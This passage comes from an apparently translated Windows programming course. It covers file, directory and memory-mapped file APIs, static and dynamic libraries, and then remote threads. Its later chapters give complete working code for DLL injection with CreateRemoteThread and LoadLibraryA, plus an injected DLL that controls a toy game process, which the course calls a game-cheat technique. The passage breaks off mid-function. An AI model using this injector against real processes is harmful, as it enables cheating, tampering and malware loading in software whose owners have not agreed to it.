    LPTSTR lpFileSystemNameBuffer,    // file system name buffer (OUT): the file system name (e.g. FAT or NTFS)
    DWORD nFileSystemNameSize         // length of file system name buffer (IN)
);
// get the volume information
TCHAR szVolumeName[260];
DWORD dwVolumeSerialNumber;
DWORD dwMaximumComponentLength;
DWORD dwFileSystemFlags;
TCHAR szFileSystemNameBuffer[260];
GetVolumeInformation("C:\\", szVolumeName, 260, &dwVolumeSerialNumber, &dwMaximumComponentLength, &dwFileSystemFlags, szFileSystemNameBuffer, 260);
As shown below, I retrieved the information of logical drive C:
22.2 Directory APIs
22.2.1 Creating a Directory
CreateDirectory creates a directory. Its signature is:
BOOL CreateDirectory(
    LPCTSTR lpPathName,                        // directory name: specify the full path including the drive letter
    LPSECURITY_ATTRIBUTES lpSecurityAttributes // SD: security attributes, contains the security descriptor
);
Create a test directory on drive C:
// create a directory; without an absolute path it defaults to the program's current directory
CreateDirectory(TEXT("C:\\test"), NULL);
22.2.2 Removing a Directory
RemoveDirectory removes a directory. Its signature is:
BOOL RemoveDirectory(
    LPCTSTR lpPathName // directory name: specify the full path including the drive letter
);
Remove the test directory on drive C:
// remove the directory
RemoveDirectory(TEXT("C:\\test"));
22.2.3 Renaming (Moving) a Directory
MoveFile renames (moves) a directory. Its signature is:
BOOL MoveFile(
    LPCTSTR lpExistingFileName, // file name: the directory name
    LPCTSTR lpNewFileName       // new file name: the new directory name
);
Rename the test folder on drive C to test1; you can also think of it as moving it to a new location under a new name:
// rename (move) the directory
MoveFile(TEXT("C:\\test"), TEXT("C:\\test1"));
22.2.4 Getting the Program's Current Directory
GetCurrentDirectory retrieves the program's current directory. Its signature is:
DWORD GetCurrentDirectory(
    DWORD nBufferLength, // size of directory buffer (IN)
    LPTSTR lpBuffer      // directory buffer (OUT): the current directory name
);
Example:
// get the program's current directory
TCHAR dwOutDirectory[200];
GetCurrentDirectory(200, dwOutDirectory);
22.2.5 Setting the Program's Current Directory
SetCurrentDirectory sets the program's current directory. Its signature is:
BOOL SetCurrentDirectory(
    LPCTSTR lpPathName // new directory name
);
Example:
// set the program's current directory
SetCurrentDirectory(TEXT("C:\\test"));
22.3 File APIs
22.3.1 Creating a File
CreateFile creates a file. Its signature is:
HANDLE CreateFile(
    LPCTSTR lpFileName,                         // file name
    DWORD dwDesiredAccess,                      // access mode
    DWORD dwShareMode,                          // share mode: 0 means exclusive — while in use nobody else can use it
    LPSECURITY_ATTRIBUTES lpSecurityAttributes, // SD: security attributes, contains the security descriptor
    DWORD dwCreationDisposition,                // how to create: can also open an existing file
    DWORD dwFlagsAndAttributes,                 // file attributes: can create a hidden file
    HANDLE hTemplateFile                        // handle to template file
);
Create a hidden file, readable and writable, overwriting if it exists and creating it if not:
// create the file
CreateFile(TEXT("C:\\A.txt"), GENERIC_READ|GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, NULL);
22.3.2 Closing a File
CloseHandle closes a file. Its signature is:
BOOL CloseHandle(
    HANDLE hObject // handle to object: the file handle
);
22.3.3 Getting a File's Size
GetFileSize retrieves a file's size. Its signature is:
DWORD GetFileSize(
    HANDLE hFile,          // handle to file (IN)
    LPDWORD lpFileSizeHigh // high-order word of file size (OUT): rarely needed; the size usually fits in the low 32 bits, i.e. the return value
);
Example:
// open the file
HANDLE hFile = CreateFile(TEXT("C:\\A.txt"), GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
// get the file size in bytes
DWORD lpFileSizeHigh;
DWORD dwLow = GetFileSize(hFile, &lpFileSizeHigh);
// close the file
CloseHandle(hFile);
22.3.4 Getting a File's Attributes and Information
GetFileAttributes and GetFileAttributesEx retrieve a file's attributes and information. Their signatures are:
DWORD GetFileAttributes( // attributes only
    LPCTSTR lpFileName // name of file or directory
);

BOOL GetFileAttributesEx( // attributes and information
    LPCTSTR lpFileName,                  // file or directory name (IN)
    GET_FILEEX_INFO_LEVELS fInfoLevelId, // attribute class (IN): GetFileExInfoStandard is its only value
    LPVOID lpFileInformation             // attribute information (OUT): receives the attributes and information
);
Example:
WIN32_FILE_ATTRIBUTE_DATA data; // define the structure

GetFileAttributesEx(TEXT("C:\\A.txt"), GetFileExInfoStandard, &data); // pass a pointer to the structure
22.3.5 Reading/Writing/Copying/Deleting Files
ReadFile, WriteFile, CopyFile and DeleteFile read, write, copy and delete files. Their signatures are:
BOOL ReadFile( // read a file
    HANDLE hFile,                // handle to file
    LPVOID lpBuffer,             // data buffer (OUT): where the data goes
    DWORD nNumberOfBytesToRead,  // number of bytes to read
    LPDWORD lpNumberOfBytesRead, // number of bytes actually read
    LPOVERLAPPED lpOverlapped    // overlapped buffer
);

BOOL WriteFile( // write a file
    HANDLE hFile,                   // handle to file
    LPCVOID lpBuffer,               // data buffer: where the data to write lives
    DWORD nNumberOfBytesToWrite,    // number of bytes to write
    LPDWORD lpNumberOfBytesWritten, // number of bytes actually written
    LPOVERLAPPED lpOverlapped       // overlapped buffer
);

BOOL CopyFile( // copy a file
    LPCTSTR lpExistingFileName, // name of an existing file
    LPCTSTR lpNewFileName,      // name of the new file
    BOOL bFailIfExists          // FALSE overwrites an existing destination, TRUE fails instead
);

BOOL DeleteFile( // delete a file
    LPCTSTR lpFileName // file name
);
Example (the others work analogously):
#include <windows.h>
#include <stdlib.h>

int main(int argc, char* argv[])
{
    HANDLE hFile = CreateFile(TEXT("C:\\A.txt"), GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    // read the file
    // 1. allocate space
    DWORD lpFileSizeHigh;
    DWORD fileSize = GetFileSize(hFile, &lpFileSizeHigh);
    LPSTR pszBuffer = (LPSTR)malloc(fileSize);
    ZeroMemory(pszBuffer, fileSize);
    // 2. set the current read position
    // file handle, byte offset to start at, high 32 bits, relative to the start of the file
    SetFilePointer(hFile, 0, NULL, FILE_BEGIN);
    // 3. read the data
    DWORD dwReadLength;
    ReadFile(hFile, pszBuffer, fileSize, &dwReadLength, NULL);
    // 4. free the memory
    free(pszBuffer);
    // 5. close the file
    CloseHandle(hFile);
    return 0;
}
22.3.6 Finding Files
FindFirstFile and FindNextFile search for files. Their signatures are:
HANDLE FindFirstFile(
    LPCTSTR lpFileName,              // file name (IN)
    LPWIN32_FIND_DATA lpFindFileData // data buffer (OUT): pointer to a WIN32_FIND_DATA structure receiving the found file's data
);

BOOL FindNextFile(
    HANDLE hFindFile,                // search handle (IN)
    LPWIN32_FIND_DATA lpFindFileData // data buffer (OUT): pointer to a WIN32_FIND_DATA structure receiving the found file's data
);
Example:
WIN32_FIND_DATA firstFile;
WIN32_FIND_DATA nextFile;
// search drive C for files with the .txt extension
HANDLE hFile = FindFirstFile(TEXT("C:\\*.txt"), &firstFile);
printf("first file name: %s size: %d\n", firstFile.cFileName, firstFile.nFileSizeLow);
if (hFile != INVALID_HANDLE_VALUE) {
    // found one; keep calling FindNextFile, which returns TRUE while there are more matches
    while (FindNextFile(hFile, &nextFile)) {
        printf("file name: %s size: %d\n", nextFile.cFileName, nextFile.nFileSizeLow);
    }
}
23 Memory-Mapped Files
23.1 What Is a Memory-Mapped File
A memory-mapped file, as in the figure below, maps a file on disk onto physical pages and then maps those pages into virtual memory.
Advantages:
1. Accessing the file becomes as simple as accessing memory: read whenever and however you like, without the usual ceremony;
2. For very large files, memory mapping performs much better than ordinary I/O.
23.2 Reading and Writing via a Memory-Mapped File
We used CreateFileMapping earlier to create shared memory; the same function can map a file onto physical pages — we just pass it a file handle first.
The following code reads the value at the very beginning of a file:
DWORD MappingFile(LPSTR lpcFile) {
    HANDLE hFile;
    HANDLE hMapFile;
    LPVOID lpAddr;

    // 1. open the file (get a file handle)
    hFile = CreateFile(lpcFile, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    // check whether CreateFile succeeded
    if(hFile == NULL) {
        printf("CreateFile failed: %d \n", GetLastError());
        return 0;
    }

    // 2. create the FileMapping object
    hMapFile = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, 0, NULL);

    // check whether CreateFileMapping succeeded
    if(hMapFile == NULL) {
        printf("CreateFileMapping failed: %d \n", GetLastError());
        return 0;
    }

    // 3. map the physical pages into virtual memory
    lpAddr = MapViewOfFile(hMapFile, FILE_MAP_COPY, 0, 0, 0);

    // 4. read the file
    DWORD dwTest1 = *(LPDWORD)lpAddr; // read the first 4 bytes
    printf("dwTest1: %x \n", dwTest1);
    // 5. write the file
    // *(LPDWORD)lpAddr = 0x12345678;

    // 6. release resources
    UnmapViewOfFile(lpAddr);
    CloseHandle(hFile);
    CloseHandle(hMapFile);
    return 0;
}
Call the function:
MappingFile(TEXT("C:\\A.txt"));
Running it prints the corresponding content successfully:
Tip → to view a file as HEX in VC6, choose the binary option when opening the file.
Writing works just as easily, by analogy. Note, however, that writes do not take effect immediately: they first go to the cache, and only when you release the resources are the cached values truly written to the file.
If you want a modification to take effect immediately, force the cache to be flushed with FlushViewOfFile, whose signature is:
BOOL FlushViewOfFile(
    LPCVOID lpBaseAddress,        // starting address: the address to flush
    SIZE_T dwNumberOfBytesToFlush // number of bytes in range: how much to flush
);
Example:
FlushViewOfFile(((LPDWORD)lpAddr), 4);
23.3 Sharing via Memory-Mapped Files
A memory-mapped file lets two processes share one file:
The essence is simple: when creating the FileMapping object, just give it an object name.
Now let process A write and process B read, to see whether this really communicates across processes. The writer:
#define MAPPINGNAME "Share File"

DWORD MappingFile(LPSTR lpcFile) {
    HANDLE hFile;
    HANDLE hMapFile;
    LPVOID lpAddr;

    // 1. open the file (get a file handle)
    hFile = CreateFile(lpcFile, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    // check whether CreateFile succeeded
    if(hFile == NULL) {
        printf("CreateFile failed: %d \n", GetLastError());
        return 0;
    }

    // 2. create the FileMapping object, this time with a name
    hMapFile = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, 0, MAPPINGNAME);

    // check whether CreateFileMapping succeeded
    if(hMapFile == NULL) {
        printf("CreateFileMapping failed: %d \n", GetLastError());
        return 0;
    }

    // 3. map the physical pages into virtual memory
    lpAddr = MapViewOfFile(hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, 0);

    // 4. read the file
    // DWORD dwTest1 = *(LPDWORD)lpAddr; // read the first 4 bytes
    // printf("dwTest1: %x \n", dwTest1);
    // 5. write the file
    *(LPDWORD)lpAddr = 0x41414142;
    FlushViewOfFile(((LPDWORD)lpAddr), 4);
    printf("Process A Write");
    getchar();
    // 6. release resources
    UnmapViewOfFile(lpAddr);
    CloseHandle(hFile);
    CloseHandle(hMapFile);
    return 0;
}
The reader:
#define MAPPINGNAME "Share File"

DWORD MappingFile(LPSTR lpcFile) {
    HANDLE hMapFile;
    LPVOID lpAddr;

    // 1. open the FileMapping object
    /*
        OpenFileMapping:
        HANDLE OpenFileMapping(
            DWORD dwDesiredAccess, // access mode
            BOOL bInheritHandle,   // inherit flag: TRUE means new processes can inherit the handle
            LPCTSTR lpName         // object name
        );
    */
    hMapFile = OpenFileMapping(FILE_MAP_ALL_ACCESS, FALSE, MAPPINGNAME);

    // 2. map the physical pages into virtual memory
    lpAddr = MapViewOfFile(hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, 0);

    // 3. read the file
    DWORD dwTest1 = *(LPDWORD)lpAddr; // read the first 4 bytes
    printf("dwTest1: %x \n", dwTest1);
    // 4. write the file
    // *(LPDWORD)lpAddr = 0x41414142;
    printf("Process B Read");
    getchar();
    // 5. release resources
    UnmapViewOfFile(lpAddr);
    CloseHandle(hMapFile);
    return 0;
}
Both programs are held at getchar(): process A writes 0x41414142, and process B successfully reads that value:
23.4 Copy-on-Write for Memory-Mapped Files
We know memory-mapped files can be shared, but that has a downside. As the figure shows, the DLLs our programs use, such as user32.dll, are loaded this way too; if process A modified a shared DLL, process B would break.
To remove this hazard, we can use copy-on-write.
Copy-on-write is enabled by passing FILE_MAP_COPY as the second parameter of MapViewOfFile; it means copy at the moment of writing.
With this attribute, multiple processes read the same physical pages, but when process A writes, the page is first copied to a new physical page and the write goes there:
With the copy-on-write attribute, writing does not affect the original file contents.
24 Static Link Libraries
As software evolves it grows more complex and feature-rich, and a large project has many developers — one person cannot do everything — so the software is split into modules, each written by its owner. The static link library is one solution for modularizing software.
24.1 Writing a Static Link Library
Create a static library project in VC6:
Create project A, then add A.cpp and A.h; declare an add function in A.h and implement it in A.cpp:
After compiling, the project's Debug directory contains A.lib — that is our static link library:
To give it to someone else, hand over A.lib together with the A.h header.
24.2 Using a Static Link Library
There are two ways to use a static link library:
24.2.1 In the Project Root
Method one: copy the generated .h and .lib files into the project root, then reference them in code:
#include "xxxx.h"
#pragma comment(lib, "xxxx.lib")
24.2.2 In the VC6 Installation Directory
Method two: copy xxxx.h and xxxx.lib into the VC6 installation directory alongside the standard library files, then add xxxx.lib under Project -> Settings -> Link -> Object/library modules; after that you can use it like the C runtime library.
• Header path: C:\Program Files\Microsoft Visual Studio\VC98\Include
• Static library path: C:\Program Files\Microsoft Visual Studio\VC98\Lib
Enter A.lib in the edit box; separate multiple .lib files with spaces:
24.3 Drawbacks of Static Link Libraries
First: executables built with static linking are larger, and at the assembly level there is no way to tell which code came from the static library:
This also reveals the essence of a static link library: the interfaces (functions) you call are written directly into your program.
Second: common code is duplicated, which is wasteful — if several projects use the same static library, the same code is copied into each of them.
25 Dynamic Link Libraries
Dynamic link libraries fix both drawbacks of static link libraries. A DLL (Dynamic Link Library) is Microsoft's implementation of the shared-library concept in Windows; these library files use the extensions .dll and .ocx (libraries containing ActiveX controls).
25.1 Creating a Dynamic Link Library
25.1.1 The extern Way
Create the project in VC6:
As with the static library, create a new class MyDLL, which automatically creates MyDLL.h and MyDLL.cpp:
In MyDLL.h we declare the interface (functions). Unlike the static library we cannot declare them directly; a fixed format is required:
extern "C" _declspec(dllexport) calling-convention return-type function-name (parameter-list);
Implement the functions in MyDLL.cpp, writing the same calling convention at the start:
Compiling produces B.dll in the Debug directory:
Here we can use LordPE to inspect this DLL's export table (intermediate-course material, skip for now); all we need to know is that the export table lists the functions the DLL declares:
You can clearly see that our function name became _add@8.
25.1.2 Using a .DEF File
We can add a file with the .def extension to the project and declare exports in it with this format:
EXPORTS
    function-name @ordinal        // has an ordinal and a name
    function-name @ordinal NONAME // has an ordinal, no name
Modified this way:
Header file:
CPP file:
DEF file:
Then compile and inspect with LordPE: the function names no longer carry the @xxx decoration — they are exactly what we defined:
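As a concrete illustration (my own reconstruction of what the screenshots likely showed, reusing the add example; the file names are assumptions):
// MyDLL.h — with a .def file doing the exporting, a plain declaration suffices
int __stdcall add(int a, int b);

; B.def — module-definition file
EXPORTS
    add @1
Exported this way, LordPE shows the name simply as add instead of _add@8.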
The benefit: the function name is plainly visible, and NONAME can hide it at the application level.
25.2 Using a Dynamic Link Library
Using a DLL takes a somewhat tedious sequence of steps:
// copy the DLL file into the project directory

// step 1: define a function-pointer type, e.g.:
typedef int (*lpAdd)(int,int);

// step 2: declare a function-pointer variable, e.g.:
lpAdd myAdd;

// step 3: load the dll into memory, e.g.:
// LoadLibrary searches the current directory first, then the system directories
HINSTANCE hModule = LoadLibrary("B.dll");

// step 4: get the function's address, e.g.:
myAdd = (lpAdd)GetProcAddress(hModule, "add");

// step 5: call the function, e.g.:
int a = myAdd(10,2);

// step 6: free the dynamic link library, e.g.:
FreeLibrary(hModule);
The result is shown below:
26 Implicit Linking
The way we called the DLL before is actually explicit linking: very flexible, but cumbersome to use, with many steps.
This chapter covers implicit linking: configure once, and everything afterwards is convenient.
26.1 Implicit Linking
Implicit linking takes these steps (a concrete sketch follows the formats below):
1. Put the .dll and .lib in the project directory
2. Add #pragma comment(lib, "name.lib") to the calling file
3. Add the function declaration
The declaration format is:
_declspec(dllimport) calling-convention return-type function-name (parameter-list);
Note: the course writes _declspec with two underscores in places; one underscore and two underscores (__declspec) are in fact equivalent.
Note also: if you created the DLL the extern "C" way, the declaration in step 3 must follow the extern format:
extern "C" _declspec(dllexport) calling-convention return-type function-name (parameter-list);
extern "C" _declspec(dllimport) calling-convention return-type function-name (parameter-list);
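Putting the three steps together, a minimal sketch assuming the B.dll/B.lib exporting add from the previous chapter (the names and calling convention are assumptions):
// caller.cpp — implicit linking
#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "B.lib") // step 2: link against the import library
extern "C" _declspec(dllimport) int __stdcall add(int a, int b); // step 3: declare the import

int main(int argc, char* argv[])
{
    // no LoadLibrary/GetProcAddress needed: the loader resolves add at startup
    printf("%d\n", add(10, 2));
    return 0;
}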
26.2 How Implicit Linking Works
With implicit linking, the compiler records the linked DLL files in the import table:
We can check with LordPE:
It even records in detail which functions of each DLL are used:
26.3 Advantages of DLLs
As the figure shows, a DLL is loaded into memory only once; modifications follow the copy-on-write principle, so they affect neither the other processes using the DLL nor the DLL itself:
26.4 The DllMain Function
A console program's entry point is Main; a DLL's entry function is DllMain (which may execute many times, unlike Main, which executes once). Its signature is:
BOOL WINAPI DllMain(
    HINSTANCE hinstDLL, // handle to the DLL module: where this DLL was loaded
    DWORD fdwReason,    // reason for calling: one of 4 cases — DLL_PROCESS_ATTACH (a process calls LoadLibrary for the first time), DLL_PROCESS_DETACH (a process frees the DLL), DLL_THREAD_ATTACH (another thread of the process calls LoadLibrary again), DLL_THREAD_DETACH (another thread of the process frees the DLL)
    LPVOID lpvReserved  // reserved
);
27 Remote Threads
27.1 The Concept of a Thread
A thread is an execution entity attached to a process; it is the flow of code execution, and code can only run through a thread.
27.2 Creating a Remote Thread
The function for creating a remote thread is CreateRemoteThread. Its signature is:
HANDLE CreateRemoteThread(
    HANDLE hProcess,                          // handle to process (IN)
    LPSECURITY_ATTRIBUTES lpThreadAttributes, // SD (IN): security attributes, contains the security descriptor
    SIZE_T dwStackSize,                       // initial stack size (IN)
    LPTHREAD_START_ROUTINE lpStartAddress,    // thread function (IN): the address must exist inside the other process
    LPVOID lpParameter,                       // thread argument (IN)
    DWORD dwCreationFlags,                    // creation option (IN)
    LPDWORD lpThreadId                        // thread identifier (OUT)
);
CreateThread creates a thread in the current process, while CreateRemoteThread can create a thread in another process, so a remote thread is simply a thread that is not in our own process.
First create process A with this code:
void Fun() {
    for(int i = 0; i <= 5; i++) {
        printf("Fun running... \n");
        Sleep(1000);
    }
}

DWORD WINAPI ThreadProc(LPVOID lpParameter) {
    Fun();
    return 0;
}

int main(int argc, char* argv[]) {

    HANDLE hThread = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);

    CloseHandle(hThread);

    getchar();
    return 0;
}
Process B implements the remote-thread creation below. Its function MyCreateRemoteThread takes two parameters: a process ID and a thread-function address. The process ID can be found in Task Manager:
BOOL MyCreateRemoteThread(DWORD dwProcessId, DWORD dwProcessAddr) {
    DWORD dwThreadId;
    HANDLE hProcess;
    HANDLE hThread;
    // 1. get the process handle
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
    // check whether OpenProcess succeeded
    if(hProcess == NULL) {
        OutputDebugString("OpenProcess failed! \n");
        return FALSE;
    }
    // 2. create the remote thread
    hThread = CreateRemoteThread(
        hProcess,                              // handle to process
        NULL,                                  // SD
        0,                                     // initial stack size
        (LPTHREAD_START_ROUTINE)dwProcessAddr, // thread function
        NULL,                                  // thread argument
        0,                                     // creation option
        &dwThreadId                            // thread identifier
    );
    // check whether CreateRemoteThread succeeded
    if(hThread == NULL) {
        OutputDebugString("CreateRemoteThread failed! \n");
        CloseHandle(hProcess);
        return FALSE;
    }

    // 3. close the handles
    CloseHandle(hThread);
    CloseHandle(hProcess);

    // return
    return TRUE;
}
Set a breakpoint in process A's code to find the thread function's address:
Fill in the two values and the remote thread is created:
28 Remote Thread Injection
Before, we created a remote thread that called the target's own thread function. If we want a remote thread to run a thread function we define ourselves, we need remote thread injection.
28.1 What Is Injection
Injection means writing a module or code into another process's address space without that process knowing or allowing it, and then getting it executed.
In the security field, injection is a very important technique, and injection versus anti-injection is an ever-changing and increasingly fierce contest.
Known injection methods: remote-thread injection, APC injection, message-hook injection, registry injection, import-table injection, IME injection, and so on.
28.2 The Remote Thread Injection Flow
The idea is to create a thread in process A whose thread function is LoadLibrary.
Why does this work? Because a remote thread function only has to return 4 bytes and take one 4-byte parameter (ThreadProc meets exactly these conditions).
Now look at LoadLibrary's signature:
HMODULE LoadLibrary(
    LPCTSTR lpFileName // file name of module
);
Press F12 on HMODULE and LPCTSTR and you will find both are 4 bytes wide.
The concrete steps are shown in the figure:
28.3 Getting the Code to Run
The DLL: in its entry function we check the reason and create a thread:
// B.cpp : Defines the entry point for the DLL application.
//

#include "stdafx.h"

DWORD WINAPI ThreadProc(LPVOID lpParameter) {
    for (;;) {
        Sleep(1000);
        printf("DLL RUNNING...");
    }
}

BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{   // when a process calls LoadLibrary on us, create a thread running ThreadProc
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);
            break;
    }
    return TRUE;
}
For the target we can use the Test1.exe written earlier; put the compiled DLL and Test1.exe in the same directory and start Test1.exe.
The injector:
// Test.cpp : Defines the entry point for the console application.
//

#include "StdAfx.h"

// LoadDll takes two parameters: a process ID and the DLL file's path
BOOL LoadDll(DWORD dwProcessID, char* szDllPathName) {

    BOOL bRet;
    HANDLE hProcess;
    HANDLE hThread;
    DWORD dwLength;
    DWORD dwLoadAddr;
    LPVOID lpAllocAddr;
    DWORD dwThreadID;
    HMODULE hModule;

    bRet = 0;
    dwLoadAddr = 0;
    hProcess = 0;

    // 1. get the process handle
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessID);
    if (hProcess == NULL) {
        OutputDebugString("OpenProcess failed! \n");
        return FALSE;
    }

    // 2. length of the DLL path, +1 for the terminating 0
    dwLength = strlen(szDllPathName) + 1;

    // 3. allocate memory in the target process
    lpAllocAddr = VirtualAllocEx(hProcess, NULL, dwLength, MEM_COMMIT, PAGE_READWRITE);
    if (lpAllocAddr == NULL) {
        OutputDebugString("VirtualAllocEx failed! \n");
        CloseHandle(hProcess);
        return FALSE;
    }

    // 4. copy the DLL path into the target process's memory
    bRet = WriteProcessMemory(hProcess, lpAllocAddr, szDllPathName, dwLength, NULL);
    if (!bRet) {
        OutputDebugString("WriteProcessMemory failed! \n");
        CloseHandle(hProcess);
        return FALSE;
    }

    // 5. get the module handle
    // LoadLibrary lives in kernel32.dll, so first get kernel32.dll's module handle
    hModule = GetModuleHandle("kernel32.dll");
    if (!hModule) {
        OutputDebugString("GetModuleHandle failed! \n");
        CloseHandle(hProcess);
        return FALSE;
    }

    // 6. get LoadLibraryA's address
    dwLoadAddr = (DWORD)GetProcAddress(hModule, "LoadLibraryA");
    if (!dwLoadAddr){
        OutputDebugString("GetProcAddress failed! \n");
        CloseHandle(hModule);
        CloseHandle(hProcess);
        return FALSE;
    }

    // 7. create the remote thread, loading the DLL
    hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)dwLoadAddr, lpAllocAddr, 0, &dwThreadID);
    if (!hThread){
        OutputDebugString("CreateRemoteThread failed! \n");
        CloseHandle(hModule);
        CloseHandle(hProcess);
        return FALSE;
    }

    // 8. close the handles
    CloseHandle(hThread);
    CloseHandle(hProcess);

    return TRUE;
}

int main(int argc, char* argv[]) {

    LoadDll(384, "C:\\Documents and Settings\\Administrator\\桌面\\test\\B.dll");
    getchar();
    return 0;
}
Injection succeeded:
29 Inter-Process Communication
There are many ways for processes on the same machine to communicate, but in essence they all come down to shared memory.
29.1 An Example
Suppose process A's code is as follows:
void Attack()
{
    printf("**********ATTACK********** \n");
    return;
}

void Rest()
{
    printf("**********REST********** \n");
    return;
}

void Blood()
{
    printf("**********HEAL********** \n");
    return;
}

int main(int argc, char* argv[]) {
    char cGetchar;
    printf("**********GAME BEGIN********** \n");
    while(1) {
        cGetchar = getchar();
        switch(cGetchar) {
            case 'A':
            {
                Attack();
                break;
            }
            case 'R':
            {
                Rest();
                break;
            }
            case 'B':
            {
                Blood();
                break;
            }
        }
    }
    return 0;
}
This small program attacks, rests or heals depending on the typed character. What if we want to drive it automatically instead of typing? That calls for what people usually describe as game-cheat techniques; here it is simply remote thread injection, with process B controlling process A's execution flow.
Below is the DLL's code:
// B.cpp : Defines the entry point for the DLL application.
//

#include "stdafx.h"

#define _MAP_ "SharedMemory"

// first we need the addresses of the target's functions
#define ATTACK 0x00401030
#define REST   0x00401080
#define BLOOD  0x004010D0

HANDLE g_hModule;
HANDLE g_hMapFile;
LPTSTR lpBuffer;
DWORD dwType;

DWORD WINAPI ThreadProc(LPVOID lpParameter)
{
    dwType = 0;
    g_hMapFile = OpenFileMapping(FILE_MAP_ALL_ACCESS, FALSE, _MAP_);

    if (g_hMapFile == NULL)
    {
        printf("OpenFileMapping failed: %d", GetLastError());
        return 0;
    }

    // map the memory
    lpBuffer = (LPTSTR)MapViewOfFile(g_hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, BUFSIZ);

    for (;;)
    {
        if (lpBuffer != NULL)
        {
            // read the command
            CopyMemory(&dwType, lpBuffer, 4);
        }

        if (dwType == 1)
        {
            // attack
            __asm {
                mov eax, ATTACK
                call eax
            }
            dwType = 0;
            CopyMemory(lpBuffer, &dwType, 4); // clear the command in shared memory so it runs once
        }

        if (dwType == 2)
        {
            // rest
            __asm {
                mov eax, REST
                call eax
            }
            dwType = 0;
            CopyMemory(lpBuffer, &dwType, 4); // clear the command in shared memory so it runs once
        }

        if (dwType == 3)
        {
            // heal
            __asm {
                mov eax, BLOOD
                call eax
            }
            dwType = 0;
            CopyMemory(lpBuffer, &dwType, 4); // clear the command in shared memory so it runs once
        }

        if (dwType == 4)
        {
            // unload ourselves and exit
            FreeLibraryAndExitThread((HMODULE)g_hModule, 0);
        }

        Sleep(500);
    }

    return 0;
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
        {
            CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ThreadProc, NULL, 0, NULL);
            break;
        }
    }
    return TRUE;
}
Note that we first need the addresses of the target's functions, which we can find through VC6's disassembly view:
Once the DLL is compiled, we need a process B to control process A. The code:
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>

#define _MAP_ "SharedMemory"

HANDLE g_hMapFile;
LPTSTR lpBuffer;

BOOL LoadDll(DWORD dwProcessID, char* szDllPathName) {

    BOOL bRet;
    HANDLE hProcess;
    HANDLE hThread;
    DWORD dwLength;
    DWORD dwLoadAddr;
    LPVOID lpAllocAddr;
    DWORD dwThreadID;
    HMODULE hModule;

    bRet = 0;
    dwLoadAddr = 0;
    hProcess = 0;

    // 1. get the process handle
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessID);
    if (hProcess == NULL) {
        OutputDebugString("OpenProcess failed! \n");
        return FALSE;
    }

    // 2. length of the DLL path, +1 for the terminating 0
    dwLength = strlen(szDllPathName) + 1;

    // 3. allocate memory in the target process
    lpAllocAddr = VirtualAllocEx(hProcess, NULL, dwLength, MEM_COMMIT, PAGE_READWRITE);
    if (lpAllocAddr == NULL) {
        OutputDebugString("VirtualAllocEx failed! \n");
        CloseHandle(hProcess);
        return FALSE;
    }

    // 4. copy the DLL path into the target process's memory
    bRet = WriteProcessMemory(hProcess, lpAllocAddr, szDllPathName, dwLength, NULL);
    if (!bRet) {
        OutputDebugString("WriteProcessMemory failed! \n");
        CloseHandle(hProcess);
        return FALSE;
    }

    // 5. get kernel32.dll's module handle, since LoadLibrary lives there
    hModule = GetModuleHandle("kernel32.dll");
    if (!hModule) {
        OutputDebugString("GetModuleHandle failed! \n");
        CloseHandle(hProcess);
        return FALSE;
    }

    // 6. get LoadLibraryA's address
    dwLoadAddr = (DWORD)GetProcAddress(hModule, "LoadLibraryA");
    if (!dwLoadAddr){
        OutputDebugString("GetProcAddress failed! \n");
        CloseHandle(hModule);
        CloseHandle(hProcess);
        return FALSE;
    }

    // 7. create the remote thread, loading the DLL
    hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)dwLoadAddr, lpAllocAddr, 0, &dwThreadID);
    if (!hThread){
        OutputDebugString("CreateRemoteThread failed! \n");
        CloseHandle(hModule);
        CloseHandle(hProcess);
        return FALSE;
    }

    // 8. close the handles
    CloseHandle(hThread);
    CloseHandle(hProcess);

    return TRUE;
}

BOOL Init()
{
    // create the shared memory
    g_hMapFile = CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, 0x1000, _MAP_);
    if (g_hMapFile == NULL)
    {
        printf("CreateFileMapping failed! \n");
        return FALSE;
    }

    // map the memory
    lpBuffer = (LPTSTR)MapViewOfFile(g_hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, BUFSIZ);
    if (lpBuffer == NULL)
    {
        printf("MapViewOfFile failed! \n");
        return FALSE;
    }

    return TRUE;
}

// get a process ID from a process name
DWORD GetPID(char *szName)
{
    HANDLE hProcessSnapShot = NULL;
    PROCESSENTRY32 pe32 = {0};

    hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnapShot == (HANDLE)-1)
    {
        return 0;
    }

    pe32.dwSize = sizeof(PROCESSENTRY32);
    if (Process32First(hProcessSnapShot, &pe32))
    {
        do {
            if (!strcmp(szName, pe32.szExeFile)) {
